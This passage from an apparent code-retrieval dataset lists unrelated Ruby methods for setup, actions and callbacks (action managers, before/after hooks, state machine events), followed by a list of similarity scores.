"def init_actions\n am = action_manager()\n am.add_action(Action.new(\"&Disable selection\") { @selection_mode = :none; unbind_key(32); bind_key(32, :scroll_forward); } )\n am.add_action(Action.new(\"&Edit Toggle\") { @edit_toggle = !@edit_toggle; $status_message.value = \"Edit toggle is #{@edit_toggle}\" })\n end",
"def event_callbacks(event, metadata={})\n case event\n when :reset, :review\n if confirmed\n update_attributes(confirmed: false)\n end\n when :confirm\n confirm\n # trigger :order for all applicable items\n # NOTE: :order event is common to both physical and digital items\n items.each do |i|\n if i.event_permitted(:order)\n user_id = last_transition.user_id\n i.trigger!(:order, { order_id: id, user_id: user_id })\n end\n end\n when :complete_work\n request = metadata[:request]\n work_complete_notification(request)\n when :close\n close\n end\n if event != :close && !open\n reopen\n end\n end",
"def setup_action\n return unless PONY::ERRNO::check_sequence(current_act)\n new_sequence = @action_sequence[@sequence_index+1...@action_sequence.size]\n @sequence_index = 0\n new_sequence = DND::SkillSequence::ACTS[@acts[1]] + new_sequence\n execute_sequence\n end",
"def define_tasks\n define_weave_task\n connect_common_tasks\n end",
"def setup(&block)\n define_method(:setup, &block)\n end",
"def setup\n transition_to(:setup)\n end",
"def setup\n transition_to(:setup)\n end",
"def action\n end",
"def setup( *args )\n\t\t\tself.class.setupBlocks.each {|sblock|\n\t\t\t\tdebugMsg \"Calling setup block method #{sblock}\"\n\t\t\t\tself.send( sblock )\n\t\t\t}\n\t\t\tsuper( *args )\n\t\tend",
"def config(action, *args); end",
"def setup\n @setup_proc.call(self) if @setup_proc\n end",
"def before_action \n end",
"def setup_callbacks\n defined_callbacks.each do |meth|\n unless respond_to?(\"call_#{meth}_callbacks\".to_sym)\n self.class.module_eval <<-EOE\n def call_#{meth}_callbacks(*args)\n plugin_store.each {|a| a.call_#{meth}_callbacks(*args) } if respond_to?(:plugin_store) && plugin_store\n self.send :#{meth}, *args if respond_to?(:#{meth})\n end\n EOE\n end\n end\n end",
"def action\n end",
"def matt_custom_action_begin(label); end",
"def setup\n # override this if needed\n end",
"def setup\n\t\t\t\t\t\t# Do nothing\n\t\t\t\tend",
"def setup\n\t\t\t\t\t\t# Do nothing\n\t\t\t\tend",
"def action(options,&callback)\n new_action = Action===options ? options : Action.new(options,&callback)\n # replace any with (shared name/alias or both default) + same arity\n @actions.delete_if do |existing_action|\n ((existing_action.names & new_action.names).size > 0 ||\n existing_action.default? && new_action.default?) &&\n existing_action.required.size == new_action.required.size &&\n existing_action.optional.size <= new_action.optional.size\n end\n @actions = (@actions + [new_action]).sort\n new_action\n end",
"def set_target_and_action target, action\n self.target = target\n self.action = 'sugarcube_handle_action:'\n @sugarcube_action = action\n end",
"def after(action)\n invoke_callbacks *options_for(action).after\n end",
"def pre_task\n end",
"def setup(server)\n server.on('beforeMethod', method(:before_method), 10)\n end",
"def add_actions\n attribute = machine.attribute\n name = self.name\n \n owner_class.class_eval do\n define_method(name) {self.class.state_machines[attribute].events[name].fire(self)}\n define_method(\"#{name}!\") {self.class.state_machines[attribute].events[name].fire!(self)}\n define_method(\"can_#{name}?\") {self.class.state_machines[attribute].events[name].can_fire?(self)}\n end\n end",
"def init_actions\n @select_action = SelectAction.new\n @endpoint_mouse_action = EndpointMouseAction.new\n @move_action = MoveAction.new\n end",
"def setup_signals; end",
"def after_created\r\n return unless compile_time\r\n Array(action).each do |action|\r\n run_action(action)\r\n end\r\nend",
"def after_created\r\n return unless compile_time\r\n Array(action).each do |action|\r\n run_action(action)\r\n end\r\nend",
"def set_target_and_action target, action\n self.target = target\n self.action = 'sugarcube_handle_action:'\n @sugarcube_action = action.respond_to?('weak!') ? action.weak! : action\n end",
"def initialize(*args)\n super\n @action = :set\nend",
"def after_set_callback; end",
"def setup\n #implement in subclass;\n end",
"def lookup_action; end",
"def setup &block\n if block_given?\n @setup = block\n else\n @setup.call\n end\n end",
"def setup_action\n return TSBS.error(@acts[0], 1, @used_sequence) if @acts.size < 2\n actions = TSBS::AnimLoop[@acts[1]]\n if actions.nil?\n show_action_error(@acts[1])\n end\n @sequence_stack.push(@acts[1])\n @used_sequence = @acts[1]\n actions.each do |acts|\n @acts = acts\n execute_sequence\n break if @break_action\n end\n @sequence_stack.pop\n @used_sequence = @sequence_stack[-1]\n end",
"def release_actions; end",
"def around_hooks; end",
"def save_action; end",
"def setup(easy)\n super\n easy.customrequest = @verb\n end",
"def action_target()\n \n end",
"def setup\n callback(:setup) do\n notify(:setup)\n migration_check.last_deployed_commit\n end\n end",
"def setup\n return unless @setup\n\n actions = @setup['setup'].select { |action| action['do'] }.map { |action| Action.new(action['do']) }\n run_actions_and_retry(actions)\n self\n end",
"def before_setup\n # do nothing by default\n end",
"def my_actions(options)\n @setup = false\n get_template_part(\"custom_used\",\"action_users\",true)\n end",
"def default_action; end",
"def setup(&blk)\n @setup_block = blk\n end",
"def callback_phase\n super\n end",
"def advice\n end",
"def _handle_action_missing(*args); end",
"def duas1(action)\n action.call\n action.call\nend",
"def shared_action(name, &block)\n @controller.shared_actions[name] = block\n end",
"def before_action action, &block\n @audience[:before][action] ||= Set.new\n @audience[:before][action] << block\n end",
"def setup_initial_state\n\n state_a = State.new(\"a\", 0)\n state_b = State.new(\"b\", 0)\n state_c = State.new(\"c\", 10)\n\n move_to_b = Action.new(\"move_to_b\", 1, state_b)\n\n move_to_c = Action.new(\"move_to_c\", 1, state_c)\n\n state_a.actions = [move_to_b, move_to_c]\n\n return state_a\n \nend"
] |
[
"0.6163163",
"0.6045976",
"0.5946146",
"0.591683",
"0.5890051",
"0.58349305",
"0.5776858",
"0.5703237",
"0.5703237",
"0.5652805",
"0.5621621",
"0.54210985",
"0.5411113",
"0.5411113",
"0.5411113",
"0.5391541",
"0.53794575",
"0.5357573",
"0.53402257",
"0.53394014",
"0.53321576",
"0.53124547",
"0.529654",
"0.5296262",
"0.52952296",
"0.52600986",
"0.52442724",
"0.52385926",
"0.52385926",
"0.52385926",
"0.52385926",
"0.52385926",
"0.5232394",
"0.523231",
"0.5227454",
"0.52226824",
"0.52201617",
"0.5212327",
"0.52079266",
"0.52050185",
"0.51754695",
"0.51726824",
"0.51710224",
"0.5166172",
"0.5159343",
"0.51578903",
"0.51522785",
"0.5152022",
"0.51518047",
"0.51456624",
"0.51398855",
"0.5133759",
"0.5112076",
"0.5111866",
"0.5111866",
"0.5110294",
"0.5106169",
"0.509231",
"0.50873137",
"0.5081088",
"0.508059",
"0.50677156",
"0.50562143",
"0.5050554",
"0.50474834",
"0.50474834",
"0.5036181",
"0.5026331",
"0.5022976",
"0.5015441",
"0.50121695",
"0.5000944",
"0.5000019",
"0.4996878",
"0.4989888",
"0.4989888",
"0.49864885",
"0.49797225",
"0.49785787",
"0.4976161",
"0.49683493",
"0.4965126",
"0.4958034",
"0.49559742",
"0.4954353",
"0.49535993",
"0.4952725",
"0.49467874",
"0.49423352",
"0.49325448",
"0.49282882",
"0.49269363",
"0.49269104",
"0.49252945",
"0.4923091",
"0.49194667",
"0.49174926",
"0.49173003",
"0.49171105",
"0.4915879",
"0.49155936"
] |
0.0
|
-1
|
Never trust parameters from the scary internet, only allow the white list through.
|
def desinfectante_params
params.require(:desinfectante).permit(:marca, :tipo, :precio, :presentacion, :stock, :liquido)
end
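
For context, a minimal controller sketch showing where a strong-parameters method like this is consumed (the controller class and flow below are assumptions inferred from the whitelist, not taken from the source): any attribute absent from the permit list is filtered out before mass assignment ever sees it.

# Hypothetical usage sketch: the create action funnels user input through
# desinfectante_params, so only the six permitted attributes reach the model.
class DesinfectantesController < ApplicationController
  def create
    @desinfectante = Desinfectante.new(desinfectante_params)
    if @desinfectante.save
      redirect_to @desinfectante
    else
      render :new, status: :unprocessable_entity
    end
  end

  private

  def desinfectante_params
    params.require(:desinfectante).permit(:marca, :tipo, :precio, :presentacion, :stock, :liquido)
  end
end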
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def strong_params\n params.require(:user).permit(param_whitelist)\n end",
"def strong_params\n params.require(:listing_member).permit(param_whitelist)\n end",
"def allow_params_authentication!; end",
"def allowed_params\n ALLOWED_PARAMS\n end",
"def default_param_whitelist\n [\"mode\"]\n end",
"def param_whitelist\n [:role, :title]\n end",
"def expected_permitted_parameter_names; end",
"def safe_params\n params.except(:host, :port, :protocol).permit!\n end",
"def strong_params\n params.require(:team_member).permit(param_whitelist)\n end",
"def permitir_parametros\n \t\tparams.permit!\n \tend",
"def strong_params\n params.require(:community).permit(param_whitelist)\n end",
"def permitted_strong_parameters\n :all #or an array of parameters, example: [:name, :email]\n end",
"def strong_params\n params.require(:education).permit(param_whitelist)\n end",
"def restricted_params\n #params.require(self.controller_name.classify.underscore.to_sym).permit([])\n raise(\"No strong params set, override restricted_params method in your controller. E.g. params.require(:model).permit(:attribute1, :attribute2)\")\n end",
"def allowed_params\n params.require(:user).permit(:username, :email, :password, :password_confirmation)\n end",
"def param_whitelist\n [:rating, :review]\n end",
"def param_whitelist\n whitelist = [\n :username, :name,\n :parent_id,\n :headline, :description, :video,\n :policy, :signup_mode, :category,\n :website, :facebook, :twitter, :linkedin,\n :founded_at,\n privacy: [\n :events,\n :resources\n ],\n permission: [\n :profile,\n :members,\n :children,\n :statistics,\n :posts,\n :listings,\n :resources,\n :events\n ],\n location: [\n :description,\n :street,\n :city,\n :state,\n :zip,\n :country,\n :latitude,\n :longitude\n ]\n ]\n \n if action_name === 'update'\n whitelist.delete(:parent_id)\n unless current_user.role_in(@community) === 'owner'\n whitelist.delete(:privacy)\n whitelist.delete(:permission)\n end\n end\n \n whitelist\n end",
"def param_whitelist\n if @user.present? && current_user != @user\n return [:followed]\n end\n \n whitelist = [\n :username, :email, :password,\n :first_name, :last_name,\n :birthday, :gender,\n :headline, :biography, :ask_about, :focus,\n :website, :facebook, :linkedin, :twitter, :github,\n roles: [],\n skills: [],\n interests: [],\n privacy: { contact: [] },\n location: [\n :description,\n :street,\n :city,\n :state,\n :zip,\n :country,\n :latitude,\n :longitude\n ]\n ]\n \n if action_name === 'update'\n whitelist.delete(:email)\n whitelist.delete(:password)\n end\n \n whitelist\n end",
"def valid_params_request?; end",
"def user_params \n \tparams.require(:user).permit(:name, :email, :password, :password_confirmation)# preventing CSTR\n end",
"def user_params\n params.permit(:name, :phoneNumber, :address, :postalCode, :local, :link, :counter, :latitude, :longitude) \n end",
"def strong_params\n params.require(:experience).permit(param_whitelist)\n end",
"def trim_whitelisted(params, whitelist)\n # remove any parameters that are not whitelisted\n params.each do |key, value|\n # if white listed\n if whitelist.include? key\n # strip the parameters of any extra spaces, save as string\n params[key] = value.to_s.strip\n else\n # delete any unauthorized parameters\n params.delete key\n end\n end\n params\n end",
"def whitelist_url_params\n params.require(:whitelist_url).permit(:domain)\n end",
"def allowed_params\n params.require(:allowed).permit(:email)\n end",
"def permitted_params\n []\n end",
"def trim_whitelisted(params, whitelist)\n # remove any parameters that are not whitelisted\n params.each do |key, value|\n # if white listed\n if whitelist.include? key\n # strip the parameters of any extra spaces, save as string\n params[key] = value.to_s.strip\n else\n # delete any unauthorized parameters\n params.delete key\n end\n end\n params\n end",
"def safe_params\n params.permit(:id, :name, :origin, :emails => []); #emails is an array\n end",
"def query_param\n\t\tparams.permit(:first_name, :last_name, :phone)\n\tend",
"def strong_params\n params.require(:success_metric).permit(param_whitelist)\n end",
"def devise_filter\r\n logger.debug(\"In devise_filter =>PARAMS: #{params.inspect}\")\r\n\r\n # White list for sign_up\r\n devise_parameter_sanitizer.for(:sign_up) { |u| u.permit(user_whitelist) }\r\n\r\n # White list for account update\r\n devise_parameter_sanitizer.for(:account_update) { |u| u.permit(user_whitelist, :current_password) }\r\n\r\n # White list for Invitation creation\r\n devise_parameter_sanitizer.for(:invite) { |u| u.permit(:account_type, :email, :invitation_token)}\r\n\r\n # White list for accept invitation\r\n devise_parameter_sanitizer.for(:accept_invitation) { |u| u.permit(user_whitelist, :invitation_token)}\r\n\r\n end",
"def whitelisted_user_params\n params.require(:user).\n permit( :first_name, :last_name, :email,:password,:password_confirmation,:birthday,:gender)\n end",
"def user_params\n ActionController::Parameters.permit_all_parameters = true\n params.require(:user) #.permit(:name, :surname, :phone, :password, :email, :time_zone)\n end",
"def safe_params\n params.require(:user).permit(:name)\n end",
"def strong_params\n params.require(:metric_change).permit(param_whitelist)\n end",
"def get_params\n\t\treturn ActionController::Parameters.new(self.attributes).permit(\"account_id\", \"title\", \"category\", \"introduction\", \"tags\", \"segment_type\", \"visible\", \"status\", \"main_image\")\n\tend",
"def grant_params\n @whitelisted = params.require(:grant).permit(:name, :description, :agency_id, :acronym)\n end",
"def check_params; true; end",
"def param_whitelist\n whitelist = [\n :description,\n :progress,\n :kpi_id\n ]\n \n unless action_name === 'create'\n whitelist.delete(:kpi_id)\n end\n \n whitelist\n end",
"def quote_params\n params.permit!\n end",
"def valid_params?; end",
"def paramunold_params\n params.require(:paramunold).permit!\n end",
"def user_params\n\t\tparams.permit(:nickname, :avatar, :description, :password, :gender, :birthday, :email, :phone, :qq_id, :wechat_id)\n\tend",
"def filtered_parameters; end",
"def user_params\n params.permit(\n \t:id,\n \t:email, \n \t:first_name, \n \t:last_name, \n \t:password, \n \t:confirm_token, \n \t:phone_number,\n \t:facebook_link,\n \t:car_model,\n \t:license_plate)\n end",
"def filtering_params\n params.permit(:email, :name)\n end",
"def check_params\n true\n end",
"def wx_public_params\n params.require(:wx_public).permit(:nickname, :manager, :alias)\n end",
"def allowed_params\n params.require(:user).permit(:email, :password, :role, :first_name, :last_name, :password_confirmation)\n end",
"def allowed_params\n params.require(:user).permit(:email, :password, :role, :first_name, :last_name, :password_confirmation)\n end",
"def listing_params\n\t\tparams.permit(:address, :transit_info, :rules, :other_info, :lat, :lng)\n\tend",
"def social_account_params\n\t\t\tparams.require(:social_account).permit!\n\t\tend",
"def safe_params\n resurce_name = self.class.resource_name\n params_method_name = \"#{resurce_name}_params\".to_sym\n if params[resurce_name]\n if respond_to?(params_method_name) || private_methods.include?(params_method_name)\n send(params_method_name)\n else\n raise ActiveModel::ForbiddenAttributesError, \"Please, define the '#{params_method_name}' method in #{self.class.name}\"\n end\n end\n end",
"def user_params\n params.require(:user).permit(:uri, :username, :password, :realname, :email, :publicvisible)\n end",
"def model_params\n\t\tparams.require(:manager).permit(\n\t :user_name,\n :password,\n :email,\n \t\t\t)\n\tend",
"def url_params\n params.require(:url).permit(:short_url, :original_url, :clicks, :ip_addresses)\n end",
"def article_params_whitelist\n params.require(:article).permit(:title, :description, category_ids: [])\n end",
"def college_whitelist_params\n params.require(:college_whitelist).permit(:status)\n end",
"def active_code_params\n params[:active_code].permit\n end",
"def valid_params(params)\n params.permit(:user_id, :photo_id, :originX, :originY, :width, :height)\n end",
"def filtering_params\n params.permit(:email)\n end",
"def ip_address_params\n\t\t\tparams.require(:ip_address).permit!\n end",
"def reserved_params\n params.require(:reserved).permit(:name, :email, :pax, :address, :KTP, :title)\n end",
"def pull_request_params\n whitelist = [\n :url,\n :id,\n :html_url,\n :diff_url,\n :patch_url,\n :issue_url,\n :number,\n :state,\n :locked,\n :title\n ]\n params.require(:pull_request).permit(whitelist)\n end",
"def post_params\n if current_user.admin? \n params.permit(:title, :body, :city, :country, :gps_location, :privacy, :visible, :latitude, :longitude, images: [], files: [])\n else \n params.permit(:title, :body, :city, :country, :gps_location, :privacy,:latitude, :longitude, images: [], files: [])\n end \n end",
"def list_params\n params.permit(:name)\n end",
"def filter_parameters; end",
"def filter_parameters; end",
"def vineyard_params\n params.permit(:vineyard_name, :email, :website_url, :phone, :address, :city, :region, :postcode, :country, :specialty, :description, :pet_friendly, :holiday, :tours, :events, :family_friendly, :cover_image, :image_one, :image_two, :image_three, :image_four, :user_id, :base64)\n end",
"def available_activity_params\n # params.require(:available_activity).permit(:type,:geometry,:properties)\n whitelisted = ActionController::Parameters.new({\n type: params.require(:available_activity)[:type],\n geometry: params.require(:available_activity)[:geometry].try(:permit!).to_h,\n properties: params.require(:available_activity)[:properties].try(:permit!).to_h\n }).try(:permit!)\n end",
"def user_params\n params.permit(:name, :username, :email, :password, :img_url, :bg_url, :coinbank)\n end",
"def user_params_pub\n\t \tparams[:user].permit(:hruid)\n\t end",
"def user_params\n params.permit(:id, :email, :password, :nickname, :status, :avatar, :flat_picture, :flatsharing_id, :member,\n :user, :color, :solde)\n end",
"def validate_search_inputs\n @whitelisted = params.fetch(:user, nil)\n if @whitelisted.blank?\n render_error(400, \"#{I18n.t('general_error.params_missing_key')}\": [I18n.t('general_error.params_missing_value', model: \"review\")])\n return\n else\n @whitelisted = @whitelisted.permit(:name, :uen, :description)\n end\n end",
"def url_whitelist; end",
"def param_whitelist\n [\n :title,\n :description,\n :organization,\n :team_id,\n :started_at,\n :finished_at,\n location: [\n :description,\n :street,\n :city,\n :state,\n :zip,\n :country,\n :latitude,\n :longitude\n ]\n ]\n end",
"def admin_social_network_params\n params.require(:social_network).permit!\n end",
"def valid_params(params)\n params.permit(:login, :first_name, :last_name, \n :password, :password_confirmation)\n end",
"def filter_params\n params.require(:filters).permit(:letters)\n end",
"def origin_params\n params.permit(:country, :state, :city, :postal_code, :address, :description)\n end",
"def sensitive_params=(params)\n @sensitive_params = params\n end",
"def permit_request_params\n params.permit(:address)\n end",
"def user_params\n # Ensure a user can't give themselves admin priveleges\n params.delete(:admin) if current_user.admin?\n params.require(:user).permit(:name, :email, :admin, :image)\n end",
"def secure_params\n params.require(:location).permit(:name)\n end",
"def strong_params\n params.require( :setting ).\n permit( :global_scan_limit, :per_user_scan_limit,\n :target_whitelist_patterns, :target_blacklist_patterns )\n end",
"def question_params\n params.require(:survey_question).permit(question_whitelist)\n end",
"def case_insensitive_params\n params.require(:case_insensitive).permit(:name)\n end",
"def maintenance_request_params\n params[:maintenance_request].permit! #allow all parameters for now\n end",
"def empire_master_no_match_params\n params.require(:empire_master_no_match).permit(:uid, :last_name, :list, :search_date, :double, :source)\n end",
"def url_params\n params[:url].permit(:full)\n end",
"def backend_user_params\n params.permit!\n end",
"def unwanted_params\n params.require(:unwanted).permit(:title, :description, :image)\n end",
"def filter_params\n\t\treturn params[:candidate].permit(:name_for_filter)\n\tend",
"def user_params\n params.permit(:name, :age, :username, :display_photo, :password)\n end",
"def speed_measurement_params\n\n #fuckit, to lazy to deal with permit crap right now\n ActionController::Parameters.permit_all_parameters = true\n\n params[:speed_measurement]\n end",
"def get_params\r\n #params.require(:article).permit(:title, :permalink, :content, :source_site, :introtext, :type_id, :order_by, :searchable, :created_by, :edited_by, :published_by, :published_on, :user_id)\r\n params.require(:article).permit!\r\n\r\n end",
"def pub_params\n params.require(:pub).permit(:name, :description, :phone, :email, :hidden, :city_id, :address)\n end",
"def droptraining_params\n params.permit(:training_id,:user_id, :utf8, :authenticity_token, :commit)\n end",
"def pass_params\n params[:pass].permit(:name, :price, :description, :colour, :events)\n end",
"def person_params\n # params whitelist does *not* include admin, sub, remember_token\n # TBD: share this whitelist with the list used by configuration_permitted_parameters\n # TBD: should current_password be on this list? -- for now, leaving off, since it seems to work without\n # NOTE: do not include 'admin' in this list!\n params.require(:person).permit(\n :name, \n :email, \n :description,\n :password, \n :password_confirmation\n )\n end",
"def parameter_params\n params.require(:parameter).permit(:name, :description, :param_code, :param_value, :active_from, :active_to)\n end"
] |
[
"0.6980957",
"0.6783065",
"0.6747844",
"0.6741468",
"0.67356336",
"0.6592548",
"0.65036845",
"0.64978707",
"0.64825076",
"0.64795035",
"0.64560914",
"0.64397955",
"0.6379666",
"0.6376688",
"0.6366702",
"0.6319728",
"0.6300833",
"0.6300629",
"0.6294277",
"0.6293905",
"0.6291174",
"0.62905735",
"0.6283171",
"0.6242344",
"0.62403613",
"0.6218049",
"0.62143815",
"0.62104696",
"0.61949855",
"0.6178671",
"0.6176147",
"0.6173327",
"0.6163395",
"0.6153005",
"0.6151833",
"0.6147288",
"0.61224324",
"0.6118827",
"0.61075264",
"0.61054534",
"0.6092497",
"0.6080082",
"0.60710967",
"0.60627776",
"0.60219413",
"0.60175914",
"0.60153484",
"0.60107356",
"0.60081726",
"0.60081726",
"0.60013986",
"0.6000165",
"0.59978646",
"0.59936947",
"0.59925723",
"0.5992084",
"0.59796256",
"0.5967569",
"0.5960056",
"0.59589803",
"0.5958441",
"0.5958401",
"0.5952607",
"0.5952406",
"0.5944409",
"0.59391016",
"0.593842",
"0.593842",
"0.5933845",
"0.59312123",
"0.5926475",
"0.59248453",
"0.59179676",
"0.59109294",
"0.59101623",
"0.5908172",
"0.59058356",
"0.5899052",
"0.5897749",
"0.5896101",
"0.58942914",
"0.58939576",
"0.5892063",
"0.5887407",
"0.588292",
"0.58797663",
"0.587367",
"0.58681566",
"0.5868038",
"0.5866578",
"0.58665025",
"0.58655846",
"0.58640826",
"0.5863465",
"0.5862226",
"0.586065",
"0.58581287",
"0.5854443",
"0.5854172",
"0.58507544",
"0.5849934"
] |
0.0
|
-1
|
Use callbacks to share common setup or constraints between actions.
|
def set_profile
@profile = Profile.find(params[:id])
end
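
A sketch of how this callback is typically wired (the controller name and action list are assumptions, not from the source): before_action runs set_profile ahead of each listed action, so the record lookup lives in one place instead of being repeated per action.

class ProfilesController < ApplicationController
  # Runs before each listed action; @profile is then available in show, edit, etc.
  before_action :set_profile, only: [:show, :edit, :update, :destroy]

  def show
  end

  private

  def set_profile
    @profile = Profile.find(params[:id])
  end
end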
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def set_required_actions\n # TODO: check what fields change to asign required fields\n end",
"def action_hook; end",
"def run_actions; end",
"def define_action_hook; end",
"def actions; end",
"def define_action_helpers\n if super && action == :save\n @instance_helper_module.class_eval do\n define_method(:valid?) do |*args|\n self.class.state_machines.fire_event_attributes(self, :save, false) { super(*args) }\n end\n end\n end\n end",
"def add_actions; end",
"def callbacks; end",
"def callbacks; end",
"def setup *actions, &proc\n (@setup_procs ||= []) << [proc, actions.size > 0 ? actions : [:*]]\n end",
"def define_action_helpers; end",
"def post_setup\n end",
"def action_methods; end",
"def action_methods; end",
"def action_methods; end",
"def before_setup; end",
"def action_run\n end",
"def execute(setup)\n @action.call(setup)\n end",
"def define_action_helpers?; end",
"def set_actions\n actions :all\n end",
"def action_done(action)\n dispatch = { :migrate => :done_migrating, :map => :done_mapping, :reduce =>\n :done_reducing, :finalize => :done_finalizing } \n self.send dispatch[action[:action]], action\n end",
"def dependencies action, &block\n @actions.each do |other|\n if action[:requires].include? other[:provide]\n block.call other\n end\n end\n end",
"def setup!\n return unless @setup_procs\n http_actions = actions\n @setup_procs.each do |setup_proc|\n proc, actions = setup_proc\n @setup__actions = actions.map do |action|\n\n action.is_a?(Regexp) ?\n http_actions.select { |a| a.to_s =~ action } :\n action.is_a?(String) && action =~ /\\A\\./ ?\n http_actions.map { |a| a.to_s << action if format?(a).include?(action) }.compact :\n action\n\n end.flatten\n self.class_exec &proc\n @setup__actions = nil\n end\n @setup_procs = nil\n end",
"def before_actions(*logic)\n self.before_actions = logic\n end",
"def setup_handler\n end",
"def set_action(opts)\n opts = check_params(opts,[:actions])\n super(opts)\n end",
"def setup(action)\n @targets.clear\n unless action.item.target_filters.empty?\n @targets = SES::TargetManager.make_targets(action)\n else\n item = action.item\n if item.for_opponent?\n @targets = $game_troop.alive_members\n elsif item.for_dead_friend?\n @targets = $game_party.battle_members.select { |actor| actor.dead? }\n else\n $game_party.battle_members.select { |actor| actor.alive? }\n end\n end\n @item_max = @targets.size\n create_contents\n refresh\n show\n activate\n end",
"def action; end",
"def action; end",
"def action; end",
"def action; end",
"def action; end",
"def workflow\n end",
"def revisable_shared_setup(args, block)\n class << self\n attr_accessor :revisable_options\n end\n options = args.extract_options!\n self.revisable_options = Options.new(options, &block)\n \n self.send(:include, Common)\n self.send(:extend, Validations) unless self.revisable_options.no_validation_scoping?\n self.send(:include, WithoutScope::QuotedColumnConditions)\n end",
"def setup\n @action = SampleActionAndroid.new(os_name: 'android',\n app_name: APP_PATH)\n end",
"def before(action)\n invoke_callbacks *self.class.send(action).before\n end",
"def process_action(...)\n send_action(...)\n end",
"def before_dispatch(env); end",
"def after_actions(*logic)\n self.after_actions = logic\n end",
"def setup\n # override and do something appropriate\n end",
"def setup(client)\n return unless @setup\n actions = @setup['setup'].select { |action| action['do'] }.map { |action| Action.new(action['do']) }\n actions.each do |action|\n action.execute(client)\n end\n self\n end",
"def setup(_context)\n end",
"def setup(resources) ; end",
"def validate_actions\n errors.add(:base, :should_give_at_least_one_action) if !manage? && !forecasting? && !read? && !api?\n end",
"def setup\n @resource_config = {\n :callbacks => {\n :before_create => nil,\n :after_create => nil,\n :before_update => nil,\n :after_update => nil,\n :before_destroy => nil,\n :after_destroy => nil,\n },\n :child_assoc => nil,\n :model => nil,\n :parent => nil,\n :path => nil,\n :permission => {},\n :properties => {},\n :relation => {\n :create => nil,\n :delete => nil,\n },\n :roles => nil,\n }\n end",
"def determine_valid_action\n\n end",
"def process_shared\n handle_taxes\n handle_shippings\n create_adjustments_from_params\n handle_status\n handle_inventory_refunds\n handle_payment_transactions\n order.updater.update\n end",
"def startcompany(action)\n @done = true\n action.setup\n end",
"def init_actions\n am = action_manager()\n am.add_action(Action.new(\"&Disable selection\") { @selection_mode = :none; unbind_key(32); bind_key(32, :scroll_forward); } )\n am.add_action(Action.new(\"&Edit Toggle\") { @edit_toggle = !@edit_toggle; $status_message.value = \"Edit toggle is #{@edit_toggle}\" })\n end",
"def event_callbacks(event, metadata={})\n case event\n when :reset, :review\n if confirmed\n update_attributes(confirmed: false)\n end\n when :confirm\n confirm\n # trigger :order for all applicable items\n # NOTE: :order event is common to both physical and digital items\n items.each do |i|\n if i.event_permitted(:order)\n user_id = last_transition.user_id\n i.trigger!(:order, { order_id: id, user_id: user_id })\n end\n end\n when :complete_work\n request = metadata[:request]\n work_complete_notification(request)\n when :close\n close\n end\n if event != :close && !open\n reopen\n end\n end",
"def setup_action\n return unless PONY::ERRNO::check_sequence(current_act)\n new_sequence = @action_sequence[@sequence_index+1...@action_sequence.size]\n @sequence_index = 0\n new_sequence = DND::SkillSequence::ACTS[@acts[1]] + new_sequence\n execute_sequence\n end",
"def define_tasks\n define_weave_task\n connect_common_tasks\n end",
"def setup(&block)\n define_method(:setup, &block)\n end",
"def setup\n transition_to(:setup)\n end",
"def setup\n transition_to(:setup)\n end",
"def action\n end",
"def setup( *args )\n\t\t\tself.class.setupBlocks.each {|sblock|\n\t\t\t\tdebugMsg \"Calling setup block method #{sblock}\"\n\t\t\t\tself.send( sblock )\n\t\t\t}\n\t\t\tsuper( *args )\n\t\tend",
"def config(action, *args); end",
"def setup\n @setup_proc.call(self) if @setup_proc\n end",
"def before_action \n end",
"def setup_callbacks\n defined_callbacks.each do |meth|\n unless respond_to?(\"call_#{meth}_callbacks\".to_sym)\n self.class.module_eval <<-EOE\n def call_#{meth}_callbacks(*args)\n plugin_store.each {|a| a.call_#{meth}_callbacks(*args) } if respond_to?(:plugin_store) && plugin_store\n self.send :#{meth}, *args if respond_to?(:#{meth})\n end\n EOE\n end\n end\n end",
"def action\n end",
"def matt_custom_action_begin(label); end",
"def setup\n # override this if needed\n end",
"def setup\n\t\t\t\t\t\t# Do nothing\n\t\t\t\tend",
"def setup\n\t\t\t\t\t\t# Do nothing\n\t\t\t\tend",
"def action(options,&callback)\n new_action = Action===options ? options : Action.new(options,&callback)\n # replace any with (shared name/alias or both default) + same arity\n @actions.delete_if do |existing_action|\n ((existing_action.names & new_action.names).size > 0 ||\n existing_action.default? && new_action.default?) &&\n existing_action.required.size == new_action.required.size &&\n existing_action.optional.size <= new_action.optional.size\n end\n @actions = (@actions + [new_action]).sort\n new_action\n end",
"def set_target_and_action target, action\n self.target = target\n self.action = 'sugarcube_handle_action:'\n @sugarcube_action = action\n end",
"def after(action)\n invoke_callbacks *options_for(action).after\n end",
"def pre_task\n end",
"def setup(server)\n server.on('beforeMethod', method(:before_method), 10)\n end",
"def add_actions\n attribute = machine.attribute\n name = self.name\n \n owner_class.class_eval do\n define_method(name) {self.class.state_machines[attribute].events[name].fire(self)}\n define_method(\"#{name}!\") {self.class.state_machines[attribute].events[name].fire!(self)}\n define_method(\"can_#{name}?\") {self.class.state_machines[attribute].events[name].can_fire?(self)}\n end\n end",
"def init_actions\n @select_action = SelectAction.new\n @endpoint_mouse_action = EndpointMouseAction.new\n @move_action = MoveAction.new\n end",
"def setup_signals; end",
"def after_created\r\n return unless compile_time\r\n Array(action).each do |action|\r\n run_action(action)\r\n end\r\nend",
"def after_created\r\n return unless compile_time\r\n Array(action).each do |action|\r\n run_action(action)\r\n end\r\nend",
"def set_target_and_action target, action\n self.target = target\n self.action = 'sugarcube_handle_action:'\n @sugarcube_action = action.respond_to?('weak!') ? action.weak! : action\n end",
"def initialize(*args)\n super\n @action = :set\nend",
"def after_set_callback; end",
"def setup\n #implement in subclass;\n end",
"def lookup_action; end",
"def setup &block\n if block_given?\n @setup = block\n else\n @setup.call\n end\n end",
"def setup_action\n return TSBS.error(@acts[0], 1, @used_sequence) if @acts.size < 2\n actions = TSBS::AnimLoop[@acts[1]]\n if actions.nil?\n show_action_error(@acts[1])\n end\n @sequence_stack.push(@acts[1])\n @used_sequence = @acts[1]\n actions.each do |acts|\n @acts = acts\n execute_sequence\n break if @break_action\n end\n @sequence_stack.pop\n @used_sequence = @sequence_stack[-1]\n end",
"def release_actions; end",
"def around_hooks; end",
"def save_action; end",
"def setup(easy)\n super\n easy.customrequest = @verb\n end",
"def action_target()\n \n end",
"def setup\n callback(:setup) do\n notify(:setup)\n migration_check.last_deployed_commit\n end\n end",
